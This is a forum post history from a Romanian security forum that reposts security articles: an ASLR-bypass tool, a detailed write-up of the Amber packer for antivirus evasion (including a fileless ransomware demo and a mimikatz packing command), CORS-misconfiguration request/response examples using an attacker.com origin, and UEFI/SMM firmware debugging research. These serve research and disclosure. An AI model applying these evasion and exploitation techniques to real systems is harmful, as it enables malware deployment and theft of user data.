Nytro
Posts: 18725
Days Won: 707
Everything posted by Nytro
-
From a security standpoint, I'd go with the iPhone, although it's rather limited when it comes to functionality. All the phones listed do well in the camera department: https://www.dxomark.com/category/mobile-reviews/ As for the CPU, RAM and so on, we're at a point where a good phone shouldn't have problems in those areas.
-
Which phone would you like to have? I made a poll; I'm curious what the opinions are around here.
-
Today is the last day you can buy a ticket at the lower price.
-
[RST] NetRipper - Smart traffic sniffing for penetration testers
Nytro replied to Nytro's topic in Proiecte RST
Yes, that's where I presented it, thanks. For now I still work on it from time to time. If you have suggestions, or if you run into problems, post them here and I'll take care of them when I have time. -
On the Speakers page:

.ts-speaker-image img {
    height: 200px;
    width: auto;
    margin-left: auto;
    margin-right: auto;
}

The "margin-*" rules are missing. @Andrei, for those with OCD.
-
[RST] NetRipper - Smart traffic sniffing for penetration testers
Nytro replied to Nytro's topic in Proiecte RST
I've added support for Chrome 62. -
Stupid. Any AV company (for example) can install its own Root CA and that's that.
-
Where did you find that connection with codette? PS: Prices go up starting November 1st; my suggestion is to buy tickets earlier: https://def.camp/tickets/
-
ASLRay

Linux ELF x32 and x64 ASLR bypass exploit with stack-spraying.

Properties:
- ASLR bypass
- Cross-platform
- Minimalistic
- Simplicity
- Unpatchable

Dependencies:
- Linux 2.6.12+ - would work on any x86-64 Linux-based OS
- BASH - the whole script

Limitations:
- Stack needs to be executable (-z execstack)
- Binary has to be exploited through arguments locally (not file, socket or input)
- No support for other architectures and OSes (TODO)
- Need to know the buffer limit/size

Source: https://github.com/cryptolok/ASLRay#aslray
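The general idea behind argument-based stack spraying can be illustrated with a sketch. This is not ASLRay's actual script (which is BASH); the layout, sizes and guessed address below are hypothetical, and a real argv payload would also have to avoid NUL bytes, which the packed 64-bit address here contains.

```python
import struct

def build_spray_arg(guess_addr: int, buf_size: int, sled_len: int, shellcode: bytes) -> bytes:
    """Build an argv-style payload: filler up to the saved return address,
    then a long 'sled' of the same address guess repeated many times. With
    ASLR, the guess only has to land somewhere inside the sprayed region,
    so repetition raises the hit probability per attempt."""
    ret = struct.pack("<Q", guess_addr)   # little-endian x86-64 address
    padding = b"\x90" * buf_size          # filler overflowing the buffer
    sled = ret * (sled_len // len(ret))   # spray the same guess repeatedly
    return padding + sled + shellcode

# hypothetical stack address guess, 64-byte buffer, 4 KB spray region
payload = build_spray_arg(0x7FFFFFFFE000, 64, 4096, b"\xcc" * 32)
```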
-
Introducing New Packing Method: First Reflective PE Packer Amber
October 24, 2017 | Ege Balci | Operating System, Research, Tools

Because of the increasing security standards inside operating systems and the rapid improvements in malware detection technology, today's malware authors take advantage of the transparency offered by in-memory execution methods. In-memory (fileless) execution of a PE file can be defined as executing a compiled PE file inside memory while manually performing the operations that the OS loader would perform when executing the file normally. In-memory execution facilitates obfuscation and anti-emulation techniques; additionally, malware using such methods leaves fewer footprints on the system, since it does not have to place a file on the hard drive.

Combining in-memory execution methods with multi-stage infection models allows malware to infect systems with very small loader programs; the only purpose of a loader is to load and execute the actual malware code by connecting to a remote system. Small loaders are hard for security products to detect, because both the purpose and the code fragments of loaders are very common among legitimate applications. Malware using this approach can still be detected by scanning memory and inspecting process behavior, but for security products these operations are harder to implement and costly because of the higher resource usage (Ramilli, 2010 [1]).

The current rising trend in malware detection is to use machine learning to automate detection by feeding very large datasets into the system; as in all machine learning applications, the mechanism gets smarter and more accurate over time as it absorbs more malware samples. These mechanisms can serve large numbers of systems at a scale human malware analysts can't match.
The Malware Detection Using Machine Learning [2] paper by Gavriluț Dragoș from BitDefender Romania Labs explains the inner workings of machine learning for malware detection in detail. According to the Automatic Analysis of Malware Behavior using Machine Learning [3] paper by Konrad Rieck, with enough data and time, false positives will approach zero percent and deterministic detection will be significantly effective even on new and novel malware samples.

The main purpose of this work is to develop a new packing methodology for PE files that changes the way malware is delivered to systems. Instead of trying to find new anti-detection techniques that end up feeding the machine learning datasets, delivering the payload via fileless code injection directly bypasses most security mechanisms. With this new packing method it is possible to convert compiled PE files into multi-stage infection payloads that can be used with common software vulnerabilities such as buffer overflows.

Known Methods

The following techniques were the inspiration for our new packing method.

Reflective DLL Injection [4] is a great library injection technique developed by Stephen Fewer and the main inspiration for this new packer, named Amber. The technique allows in-memory execution of a specially crafted DLL written with a reflective programming approach, which also enables multi-stage payload deployment. Besides its many advantages, it has a few limitations. The first is the required file format: the technique expects the malware to be developed or recompiled as a DLL, and in most cases converting an already compiled EXE to a DLL is not possible or requires extensive work on the binary. The second limitation is the need for relocation data.
The Reflective DLL injection technique requires relocation data for adjusting the base address of the DLL in memory. The method has also been around for a long time, which means up-to-date security products can easily detect its usage. Our new tool, Amber, provides solutions for each of these limitations.

Process Hollowing [5] is another commonly known in-memory execution method, which uses documented Windows API functions to create a new process and map an EXE file inside it. The method is popular among crypters and packers designed to decrease malware detection rates, but it also has several drawbacks. Because of Address Space Layout Randomization (ASLR) in up-to-date Windows systems, the memory address of a newly created process is randomized, so process hollowing also needs to perform image base relocation, which again requires relocation data inside the PE file. Another drawback is that using specific file mapping and process creation API functions in a specific order makes this method easy for security products to identify.

Hyperion [6] is a crypter for PE files, developed and presented by Christian Ammann in 2012. It explains the theoretical aspects of runtime crypters and how to implement one. The PE parsing approach in assembly and the design perspective used while developing Hyperion helped us with our POC packer.

Technical Details of the New Packing Method: Amber

Executing a compiled binary inside OS memory fundamentally comes down to imitating the OS's PE loader. On Windows, the PE loader does many important things; among them, mapping the file into memory and resolving the addresses of imported functions are the most important stages of executing an EXE file.
Current methods for executing EXE files in memory use specific Windows API functions to mimic the Windows PE loader. The common approach is to create a new suspended process by calling the CreateProcess API function and map the entire EXE image inside it with the help of the NtMapViewOfSection, MapViewOfFile and CreateFileMapping functions. The usage of such functions indicates suspicious behavior and increases the chance of the malware being detected.

One of the key goals while developing our packer was to use as few API functions as possible. To avoid the suspicious file mapping functions, our packer uses pre-mapped PE images; moreover, execution of the malware occurs inside the target process itself, without using the CreateProcess API function. The malware executed inside the target process runs with the same process privileges, because of the shared _TEB block containing the privilege information and configuration of the process.

Amber has two types of stub: one designed for EXE files that support ASLR, and another for EXE files that are stripped or have no relocation data. The ASLR-supported stub uses a total of four Windows API calls, and the other stub uses only three, all of which are very commonly used by the majority of legitimate applications.

ASLR-Supported Stub:
- VirtualAlloc
- CreateThread
- LoadLibraryA
- GetProcAddress

Non-ASLR Stub:
- VirtualProtect
- LoadLibraryA
- GetProcAddress

In order to call these APIs at runtime, Amber uses a publicly known EAT parsing technique from Stephen Fewer's Reflective DLL injection [4] method. The technique simply locates the InMemoryOrderModuleList structure by navigating through the Process Environment Block (PEB) in memory. After locating the structure, it is possible to reach the export tables of all loaded DLLs by reading each _LDR_DATA_TABLE_ENTRY structure pointed to by InMemoryOrderModuleList.
After reaching the export table of a loaded DLL, the stub compares the precalculated ROR (rotate right) 13 hash of each exported function name until a match occurs.

Amber's packing method also provides several alternative Windows API usage options. One of them is using fixed API addresses, which is the best choice if the user is familiar with the remote process that will host the Amber payload. Using fixed API addresses directly bypasses the latest OS-level exploit mitigations that inspect export address table calls; removing the API address-finding code also reduces the overall payload size. Other techniques can be used to locate the required function addresses, such as the IAT parsing technique used by Josh Pitts in the "Teaching Old Shellcode New Tricks" [7] presentation. The current version of Amber supports only fixed API addresses and EAT parsing; IAT parsing will be added in future versions.

Generating the Payload

To generate the actual Amber payload, the packer first creates a memory-mapped image of the malware; the generated mapping contains all sections, the optional PE header, and null-byte padding for the unallocated memory space between sections. After obtaining the mapping, the packer checks the ASLR compatibility of the supplied EXE: if the EXE is ASLR compatible, the packer adds the corresponding Amber stub; if not, it uses the stub for EXE files with a fixed image base. From this point, the Amber payload is complete. The image below shows the Amber payload inside the target process.

ASLR Stub Execution

Execution of the ASLR-supported stub consists of five phases:
1. Base Allocation
2. Resolving API Functions
3. Base Relocation
4. Placement Of File Mapping
5. Execution

In the base allocation phase, the stub allocates a read/write/execute-privileged memory space the size of the malware's mapped image by calling the VirtualAlloc API function. This memory space will be the new base of the malware after the relocation process.
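The ROR-13 export-name hashing mentioned above (the scheme from Fewer's reflective loader) can be sketched as follows; the exact variant a given stub uses may differ in details such as case normalization or how module and function hashes are combined.

```python
def ror13_hash(name: bytes) -> int:
    """32-bit rotate-right-13 hash over an exported function's name.
    Stubs precompute this for the functions they need and compare it
    against each export-table entry, so no API name strings have to be
    embedded in the payload."""
    h = 0
    for b in name:
        h = ((h >> 13) | (h << (32 - 13))) & 0xFFFFFFFF  # ROR 13
        h = (h + b) & 0xFFFFFFFF                          # add next byte
    return h
```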
In the second phase, the Amber stub resolves the addresses of the functions imported by the malware and writes them into the import address table (IAT) of the mapped image. This address resolution phase is very similar to the approach used by the Windows PE loader. The stub parses the import table entries of the mapped malware image and loads each DLL used by the malware by calling the LoadLibraryA API function. Each _IMAGE_IMPORT_DESCRIPTOR entry in the import table contains a pointer to the name of a DLL as a string; the stub takes advantage of these existing strings and passes them as parameters to LoadLibraryA. After loading a required DLL, the stub saves the DLL handle and starts resolving the addresses of the imported functions with the help of the GetProcAddress API function. The _IMAGE_IMPORT_DESCRIPTOR structure also contains a pointer to the import names table, which holds the names of the imported functions in the same order as the IAT; before calling GetProcAddress, the stub passes the saved DLL handle and the function name from this table. Each returned function address is written to the malware's IAT, with 4 padding bytes between them. This process continues until the end of the import table; after all required DLLs are loaded and all imported function addresses are resolved, the second phase is complete.

In the third phase, the Amber stub starts the relocation process, adjusting addresses according to the address returned by the VirtualAlloc call. This is almost the same approach used by the Windows PE loader itself: the stub first calculates the delta between the address returned by VirtualAlloc and the preferred base address of the malware, then adds this delta to every entry in the relocation table.
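The third-phase delta relocation described above amounts to the following; this is a simplified sketch that assumes plain 32-bit absolute (HIGHLOW-style) relocation entries, not the full PE relocation-block format.

```python
def apply_relocations(image: bytearray, preferred_base: int,
                      actual_base: int, reloc_offsets: list) -> None:
    """Patch each absolute address recorded in the relocation table by the
    load delta, mirroring what the Windows loader (and a reflective stub)
    does when the image cannot load at its preferred base."""
    delta = actual_base - preferred_base
    for off in reloc_offsets:
        old = int.from_bytes(image[off:off + 4], "little")
        new = (old + delta) & 0xFFFFFFFF  # wrap to 32 bits
        image[off:off + 4] = new.to_bytes(4, "little")
```

For example, an image preferring base 0x400000 but allocated at 0x600000 gets delta 0x200000 added to every recorded pointer.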
In the fourth phase, the Amber stub places the file mapping into the previously allocated space; moving the mapped image is done with a simple assembly loop that performs a byte-by-byte move. In the final phase, the stub creates a new thread starting at the malware's entry point by calling the CreateThread API function. A new thread is created in order to give the malware a new, growable stack; additionally, executing the malware inside a new thread allows the target process to continue from its previous state. After creating the malware thread, the stub either restores execution by returning to the original caller, or jumps into an infinite loop that stalls the current thread while the malware thread runs.

Non-ASLR Stub Execution

Execution of the non-ASLR stub consists of four phases:
1. Base Allocation
2. Resolving API Functions
3. Placement Of File Mapping
4. Execution

If the malware is stripped or has no relocation data, there is no choice but to place it at its preferred base address. In this case, the stub tries to change the memory access privileges of the target process by calling the VirtualProtect API function, starting from the malware's image base and spanning the size of the mapped image. The preferred base address and the target process's sections may overlap, in which case the target process will not be able to continue after the Amber payload executes. The fixed Amber stub may also fail to change the access privileges of the specified memory region, for several possible reasons: the specified range may not be inside the current process's page boundaries (most probably because of ASLR), or the specified address may overlap with stack guard regions in memory.
This is the main limitation of Amber payloads: if the supplied malware does not support ASLR (has no relocation data) and the stub cannot change the memory access privileges of the target process, payload execution is not possible. In some situations the stub successfully changes the memory region privileges but the process crashes immediately; this is caused by other threads running inside the overwritten sections. If the target process owns multiple threads at the time of fixed stub execution, it may crash because of the changed memory privileges or because a running section was overwritten. However, these limitations do not matter when the fixed stub is not used in a multi-stage infection payload: the current POC packer can adjust the image base of the generated EXE file and the location of the Amber payload accordingly. If the allocation attempt succeeds, the first phase is complete.

The second phase is identical to the approach used by the ASLR-supported stub. After the API addresses are resolved, the same assembly loop places the completed file mapping into the previously amended memory region. In the final phase, the stub jumps to the malware's entry point and starts execution without creating a new thread. Unfortunately, use of the non-ASLR Amber stub does not allow the target process to continue from its previous state.

Multi-Stage Applications

Security measures that will be taken by operating systems in the near future will shrink the attack surface for malware even further. Microsoft announced Windows 10 S on May 2, 2017 [8]; this operating system is basically a version of Windows 10 configured for more security, and one of its main precautions is that it does not allow installing applications other than those from the Windows Store. This kind of whitelisting approach will have a huge impact on malware that infects systems via executable files.
In such a scenario, multi-stage in-memory execution payloads become one of the most effective attack vectors. Because of the position-independent nature of the Amber stubs, multi-stage attack models are possible: the current POC packer can generate a stage payload from a complex compiled PE file that can be loaded and executed directly from memory like a regular shellcode injection attack. In such overly restrictive systems, the multi-stage compatibility of Amber allows exploitation of common memory-based software vulnerabilities such as stack- and heap-based buffer overflows. However, due to the limitations of the fixed Amber stub, it is recommended to use ASLR-supported EXE files when performing multi-stage infection attacks. Stage payloads generated by the POC packer are compatible with the small loader shellcodes and payloads generated by the Metasploit Framework [9]; this also means Amber payloads can be used with all Metasploit exploits that use the multi-stage meterpreter shellcodes.

Here is the source code of Amber. Feel free to fork and contribute!
https://github.com/EgeBalci/Amber

Demo 1 - Deploying EXE files through Metasploit stagers

This video demonstrates how to deploy regular EXE files onto systems using Metasploit stager payloads. The stage.exe file generated by Metasploit fetches Amber's stage payload and executes it in memory.

Demo 2 - Deploying fileless ransomware with Amber (3 different AVs)

This video is a good example of a possible ransomware attack vector. Using Amber, a ransomware EXE file is packed and deployed to a remote system via a fileless PowerShell payload. The attack can also be replicated using any kind of buffer overflow vulnerability.
Detection Rate

The current detection rate (19.10.2017) of the POC packer is quite satisfying, but since this is going to be a public project, the detection score will inevitably rise. When no extra parameters are passed (only the file name), the packer generates a multi-stage payload, applies a basic XOR cipher with a multi-byte random key, then compiles it into an EXE file while adding a few extra anti-detection functions. The generated EXE executes the stage payload like a regular shellcode after deciphering it and performing the required environmental checks.

This particular sample is the mimikatz.exe file (SHA-256: 9369b34df04a2795de083401dda4201a2da2784d1384a6ada2d773b3a81f8dad) packed with a 12-byte XOR key (./amber mimikatz.exe -ks 12). The detection rate of mimikatz.exe before packing is 51/66 on VirusTotal. In this example the packer uses its default way of finding Windows API addresses, which is API hashing; avoiding API hashing decreases the detection rate further. The packer currently also supports fixed addresses of IAT offsets, and future versions will include IAT parser shellcodes for more alternative API address-finding methods.

VirusTotal: https://www.virustotal.com/#/file/3330d02404c56c1793f19f5d18fd5865cadfc4bd015af2e38ed0671f5e737d8a/detection
VirusCheckmate result: http://viruscheckmate.com/id/1ikb99sNVrOM
NoDistribute: https://nodistribute.com/result/image/7uMa96SNOY13rtmTpW5ckBqzAv.png

Future Work

This work introduces a new-generation packing methodology for PE files, but it does not support .NET executables; future work may include support for 64-bit PE files and .NET executables. There is also room for improvement in terms of stealth: allocation of the memory region for the entire mapped image is currently done with read/write/execute privileges, and changing the region's privileges according to the mapped image's sections after placement may decrease the detection rate.
Also, wiping the PE header after the address resolution phase can make detection harder for memory scanners. Development of the Amber POC packer will continue as an open source project.

References

[1] Ramilli, Marco, and Matt Bishop. "Multi-stage delivery of malware." Malicious and Unwanted Software (MALWARE), 2010 5th International Conference on. IEEE, 2010.
[2] Gavriluț, Dragoș, et al. "Malware detection using machine learning." Computer Science and Information Technology, 2009. IMCSIT'09. International Multiconference on. IEEE, 2009.
[3] Rieck, Konrad, et al. "Automatic analysis of malware behavior using machine learning." Journal of Computer Security 19.4 (2011): 639-668.
[4] Fewer, Stephen. "Reflective DLL injection." Harmony Security, Version 1 (2008).
[5] Leitch, John. "Process hollowing." (2013).
[6] Ammann, Christian. "Hyperion: Implementation of a PE-Crypter." (2012).
[7] Pitts, Josh. "Teaching Old Shellcode New Tricks." https://recon.cx/2017/brussels/resources/slides/RECON-BRX-2017 Teaching_Old_Shellcode_New_Tricks.pdf (2017)
[8] https://news.microsoft.com/europe/2017/05/02/microsoft-empowers-students-and-teachers-with-windows-10-s-affordable-pcs-new-surface-laptop-and-more/
[9] Rapid7 Inc, Metasploit Framework. https://www.metasploit.com
[10] Desimone, Joe. "Hunting In Memory." https://www.endgame.com/blog/technical-blog/hunting-memory (2017)
[11] Lyda, Robert, and James Hamrock. "Using entropy analysis to find encrypted and packed malware." IEEE Security & Privacy 5.2 (2007).
[12] Nasi, Emeric. "PE Injection Explained: Advanced memory code injection technique." Creative Commons Attribution-NonCommercial-NoDerivs 3.0 License (2014)
[13] Pietrek, Matt. "Peering Inside the PE: A Tour of the Win32 Portable Executable File Format." https://msdn.microsoft.com/en-us/library/ms809762.aspx (1994)

Source: https://pentest.blog/introducing-new-packing-method-first-reflective-pe-packer/
-
Exploiting Misconfigured CORS
October 25, 2017

Hi folks. This post is about some of the CORS misconfigurations I see frequently, mostly in Django applications. Let's assume all the test cases have been performed on the domain example.com. The following are the most common CORS configurations:

• Access-Control-Allow-Origin: *
  Remark: In this case we can fetch unauthenticated resources only.
• Access-Control-Allow-Origin: *
  Access-Control-Allow-Credentials: true
  Remark: In this case we can fetch unauthenticated resources only.
• Access-Control-Allow-Origin: null
  Access-Control-Allow-Credentials: true
  Remark: In this case we can fetch authenticated resources as well.
• Access-Control-Allow-Origin: https://attacker.com
  Access-Control-Allow-Credentials: true
  Remark: In this case we can fetch authenticated resources as well.
• Access-Control-Allow-Origin: https://example.com
  Access-Control-Allow-Credentials: true
  Remark: Properly implemented.

We usually see these types of CORS configuration in response headers, and most of us don't try to exploit them because we assume they are properly implemented. But that is not always true. Let's study some of the weird CORS misconfiguration cases.
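The five configurations above can be condensed into a small predicate. This is an illustrative helper (name and attacker origin are made up), encoding the rule that browsers refuse to expose credentialed responses when the allowed origin is the `*` wildcard:

```python
def can_read_authenticated(allow_origin: str, allow_credentials: bool,
                           attacker_origin: str = "https://attacker.com") -> bool:
    """True if a page on attacker_origin can read an authenticated response.
    '*' never qualifies (browsers reject the wildcard with credentials);
    'null' or a reflected attacker origin combined with
    Access-Control-Allow-Credentials: true does."""
    if not allow_credentials:
        return False
    if allow_origin == "*":
        return False
    return allow_origin in ("null", attacker_origin)
```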
• I found this vulnerability on one of the most popular Python web hosting sites, with the following request and response headers:

Original request and response headers:

GET /<redacted> HTTP/1.1
Host: dummy.example.com
User-Agent: <redacted>
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: <redacted>
Origin: https://www.example.com
Connection: close

HTTP/1.1 200 OK
Server: <redacted>
Date: <redacted>
Content-Type: application/json; charset=UTF-8
Content-Length: 87
Connection: close
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://www.example.com
Strict-Transport-Security: max-age=31536000;

Looking at the response headers, CORS seems to be implemented correctly, and most of us would not test it further. But in many such cases, changing the value of the Origin header causes it to be reflected back in the response headers:

Edited request and response headers:

GET /<redacted> HTTP/1.1
Host: dummy.example.com
User-Agent: <redacted>
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: <redacted>
Origin: https://attacker.com
Connection: close

HTTP/1.1 200 OK
Server: <redacted>
Date: <redacted>
Content-Type: application/json; charset=UTF-8
Content-Length: 87
Connection: close
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://attacker.com
Strict-Transport-Security: max-age=31536000;

• I found this vulnerability on a Bitcoin website with the following request and response headers.
Original request and response headers:

POST /<redacted> HTTP/1.1
Host: <redacted>
User-Agent: <redacted>
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Referer: <redacted>
Content-Length: 270
Cookie: <redacted>
Connection: close

HTTP/1.1 200 OK
Server: nginx
Date: <redacted>
Content-Type: application/json
Connection: close
Access-Control-Allow-Credentials: true
Content-Length: 128

Looking at the response, the Access-Control-Allow-Origin header is missing, so I added an Origin header to the HTTP request, which makes the endpoint vulnerable:

Edited request and response headers:

POST /<redacted> HTTP/1.1
Host: <redacted>
User-Agent: <redacted>
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Origin: https://attacker.com
Referer: <redacted>
Content-Length: 270
Cookie: <redacted>
Connection: close

HTTP/1.1 200 OK
Server: nginx
Date: <redacted>
Content-Type: application/json
Connection: close
Access-Control-Allow-Origin: https://attacker.com
Access-Control-Allow-Credentials: true
Content-Length: 128

Thanks for reading.

Source: http://c0d3g33k.blogspot.de/2017/10/exploiting-misconfigured-cors.html?m=1
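Server-side, the behaviour in both write-ups matches a pattern that simply echoes the request's Origin header. A minimal sketch of such a vulnerable handler (a hypothetical reconstruction for illustration, not the actual sites' code):

```python
def cors_headers(request_headers: dict) -> dict:
    """Vulnerable pattern: whatever Origin the client sends is echoed back
    together with Allow-Credentials, so any site can read authenticated
    responses cross-origin. The missing step is checking the origin
    against a whitelist before reflecting it."""
    origin = request_headers.get("Origin")
    headers = {}
    if origin:  # no whitelist check -- this is the bug
        headers["Access-Control-Allow-Origin"] = origin
        headers["Access-Control-Allow-Credentials"] = "true"
    return headers
```

A safe implementation would compare `origin` against an explicit allow-list and omit the CORS headers otherwise.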
-
24 October, 2017
UEFI BIOS holes. So Much Magic. Don't Come Inside.
Category: Research. Tags: firmware security vulnerabilities.
Download whitepaper (PDF, 855.67 KB) | Download presentation (PDF, 15.65 MB)

Introduction

In recent years, embedded software security has become a red-hot topic, attracting the attention of high-profile security researchers from all around the globe. However, code quality is still far from perfect as far as security is concerned. For instance, the CVE-2017-5721 SMM Privilege Elevation vulnerability in firmware affects a wide range of vendors, including Acer, ASRock, ASUS, Dell, HP, GIGABYTE, Lenovo, MSI, Intel, and Fujitsu.

This white paper describes how to detect a vulnerability in motherboard firmware with the help of the following tools:
- Intel DAL
- UEFITool
- CHIPSEC
- RW-Everything
and how to bypass the patch that fixes this vulnerability.

For readers who need some background information, here is a list of helpful additional materials:
- Advanced x86: Introduction to BIOS & SMM (John Butterworth)
- Training: Security of BIOS/UEFI System Firmware from Attacker and Defender Perspectives (Advanced Threat Research, McAfee/Intel)
- Attacking and Defending BIOS in 2015 (Advanced Threat Research, McAfee/Intel)
- UEFI Firmware Rootkits: Myths and Reality (Alex Matrosov and Eugene Rodionov)

Essential information on the CVE-2017-5721 SMM Privilege Elevation vulnerability can be found at the following link: https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00084&languageid=en-fr

Preliminary stage of the research

Making a showcase stand

For the showcase, we used the GA-Q170M-D3H motherboard with the Intel Q170 Express chipset. The motherboard turned out to be a perfect choice for the research, for the following reasons:
- Firmware updates are available as a binary image.
Therefore, there is no need for users to burden themselves with extracting firmware parts from .exe files, in contrast to some other vendors' devices. Note: in the scope of this research, we used the latest available firmware version, F22.
- The firmware is based on AMI Aptio V BIOS, widely used by motherboard and laptop manufacturers.
- It is possible to enable the Intel Direct Connect Interface.

The most obvious question that may come to a reader's mind here is: "What is the Intel Direct Connect Interface?" In a nutshell, the Intel Direct Connect Interface (DCI) is a technology that allows low-level processor debugging without much effort. The only things needed to debug a target system are an Intel Skylake processor (6th gen. or higher), a USB 3.0 debugging cable, and, of course, USB 3.0 ports on both the host and target systems. To operate the interface, one can use the Intel DFx Abstraction Layer (DAL) application, available as part of the Intel System Studio trial version. For more details, see "Intel DCI Secrets".

It is also necessary to install a CPU on the motherboard; the one used in this research was equipped with an Intel Core i3-6320. DRAM also has to be installed, of course. The assembled showcase stand looked like this (see Fig. 1).

Fig. 1. Showcase stand

As you can see in the picture, we unsoldered the SPI flash memory (which stores the motherboard's firmware) and put it into a SOIC8 adapter. Hence, if we accidentally "brick" the system, we will be able to recover the original firmware image using a hardware programmer.

Enabling Intel DCI on a target system

There are two ways to turn on DCI: one is simple, the other is difficult.

Enabling Intel DCI: the easy way

If your system is based on a System on Chip (SoC), you should be able to enable DCI from BIOS Setup (see Fig. 2).

Fig. 2.
Enabling DCI in BIOS Setup Another option is to use the INTEL-SA-00073 vulnerability that some motherboards have. This vulnerability allows enabling the DCI right from a target platform by writing just one byte to memory. It turned out that GA-Q170M-D3H has no option to enable the DCI in BIOS Setup. In such a case it is worth using PCH Private Configuration Space while the system is running (see Fig. 3). DCI Control Register (ECTRL) â Offset 4h Fig. 3. Enabling DCI with PCH Private Configuration Space According to the documentation, the DCI activation is conducted by toggling the fourth bit of the ECTRL register. The bit is located in memory at SBREG_BAR + (0xB8 << 0x10) + 4. The showcase had installed Windows 10 Enterprise, that is why the RW-Everything tool was used. Unfortunately, it was not possible to enable the DCI with the help of the fourth bit, while the eighth one is set to value 1. By practical consideration, it was found out that the eighth bit stands for âLockedâ, which hinders the DCI during the system operation. Nonetheless, if a system register is empty, there are all chances to enable the debugging interface without any difficulties (see Fig. 4). Fig. 4. RW-Everything tool Enabling DCI. The difficult way The DCI can be enabled by changing default settings of BIOS or PCH Straps (held inside the firmware image) with Intel Flash Image Tool. After that, it is necessary to rebuild the image and flash it to the SPI flash memory. Here, one needs to use a hardware programmer to upload a modified firmware. It is possible to make the required changes by using the AMIBCP utility that can be downloaded from the Internet. The utility gives an opportunity to change default values of different settings hidden from a user in BIOS setup. To do this open the âQ170MD3H.F22â file in the AMIBCP utility and find Control Group Structures with the names âDebug Interfaceâ and âDirect Connect Interfaceâ (see Fig. 5). Fig. 5. 
AMIBCP utility

The process of activating the settings comes down to changing the "Failsafe" and "Optimal" values to "Enabled" and then saving a new firmware image. This way, a modified firmware is ready. The only thing left is to upload the new firmware to the SPI flash memory in whatever way is convenient. After that, debugging can be initiated. If the interface is successfully activated and the target system is started, a new device, "Intel USB Native Debug Class Devices", will appear in the host system (see Fig. 6).

Fig. 6. A new device appeared in the host system

Main stage of the research

Setting up the Intel DFx Abstraction Layer

The default Intel DAL installation directory is "C:\Intel\DAL". It contains the "ConfigConsole.exe" utility, in which it is necessary to specify the corresponding Topology Config, "SKL_SPT_OpenDCI_Dbc_Only_ReferenceSettings", because the target platform consists of Skylake (SKL) and a 100-series chipset (Sunrise Point, SPT). Since the debugging interface consists of the USB 3.0 debugging cable only, the Intel DAL must be set up to work with nothing but the JTAG pins. Otherwise, it will be simply impossible to halt the processor. The Intel DAL supports startup scripts: if a "dalstartup.py" file is created in the application directory, the script will be executed when the debugging console is started.

import itpii
itp = itpii.baseaccess()
# When running with JTAG Only Mode enabled, the PREQ, PRDY, DBR and RESET
# pins are considered off, and PowerGood is considered on. We also enable
# TAP based break detection, and start to poll for probe mode entry.
# Triggered scans are disabled and memory scan delays are put into place.
itp.jtagonlymode(0, True)

After all the required actions have been performed, it is worth starting "PythonConsole.cmd" (that's right: the console is a Python shell) and halting the processor cores after initialization, just to make sure everything is operable.

Registering MasterFrame... Registered C:\Intel\DAL\MasterFrame.HostApplication.exe Successfully.
Using Intel DAL 1.9.9114.100 Built 3/29/2017 against rev ID 482226 [1714]
Using Python 2.7.12 (64bit), .NET 2.0.50727.8669, Python.NET 2.0.18, pyreadline 2.0.1
DCI: Target connection has been established
DCI: Transport has been detected
Target Configuration: SKL_SPT_OpenDCI_Dbc_Only_ReferenceSettings
Note: Target reset has occurred
Note: Power Restore occurred
Note: The 'coregroupsactive' control variable has been set to 'GPC'
Using SKL_SPT_OpenDCI_Dbc_Only_ReferenceSettings
Successfully imported 'C:\Intel\DAL\dalstartup'
>>? itp.halt()
[SKL_C0_T0] MWAIT C1 B break at 0x10:FFFFF80913FE1348 in task 0x0040
[SKL_C0_T1] MWAIT C1 B break at 0x10:FFFFF80913FE1348 in task 0x0040
[SKL_C1_T0] MWAIT C1 B break at 0x10:FFFFF80913FE1348 in task 0x0040
[SKL_C1_T1] MWAIT C1 B break at 0x10:FFFFF80913FE1348 in task 0x0040
>>>

For more information about commands, read the Intel guide located at C:\Intel\DAL\Docs\PythonCLIUsersGuide.pdf

Getting a System Management RAM dump

An SMRAM memory dump can provide plenty of information useful for vulnerability detection in a UEFI BIOS, because most UEFI structures have unique signatures, which enables memory forensics. However, the SMRAM memory range is highly privileged and protected from being accessed from an OS. Nonetheless, this is no obstacle at all when a processor-level debugger is available. To start SMRAM dumping, we need to know where it is located. Here, the CHIPSEC framework comes in handy: it is a perfect choice for operating with hardware due to its rich functionality.
As can be seen, the code below makes it easy to get the SMRAM address range:

In [5]: import chipsec.chipset
In [6]: cs = chipsec.chipset.cs()
   ...: cs.init(None, True, True)
   ...:
WARNING: *******************************************************************
WARNING: Chipsec should only be used on test systems!
WARNING: It should not be installed/deployed on production end-user systems.
WARNING: See WARNING.txt
WARNING: *******************************************************************
[CHIPSEC] API mode: using CHIPSEC kernel module API
In [7]: SMRAM = cs.cpu.get_SMRAM()
In [8]: hex(SMRAM[0])
Out[8]: '0xbd000000L'
In [9]: hex(SMRAM[1])
Out[9]: '0xbd7fffffL'

To obtain access to SMRAM via the DCI, it is necessary to set a breakpoint that fires when SMM is entered, and then simulate a Software System Management Interrupt (SW SMI) call by writing to port 0xb2. In the debugging console, it looks the following way:

>>? itp.halt()
[SKL_C0_T0] MWAIT C1 B break at 0x10:FFFFF8055F1A1348 in task 0x0040
[SKL_C0_T1] MWAIT C1 B break at 0x10:FFFFF8055F1A1348 in task 0x0040
[SKL_C1_T0] MWAIT C1 B break at 0x10:FFFFF8055F1A1348 in task 0x0040
[SKL_C1_T1] MWAIT C1 B break at 0x10:FFFFF8055F1A1348 in task 0x0040
>>> itp.cv.smmentrybreak=1
>>> itp.threads[0].port(0xb2, 0)
>>> itp.go()
>>? [SKL_C0_T0] SMM Entry break at 0xC600:0000000000008000 in task 0x0040
[SKL_C0_T1] SMM Entry break at 0xC680:0000000000008000 in task 0x0040
[SKL_C1_T0] SMM Entry break at 0xC700:0000000000008000 in task 0x0040
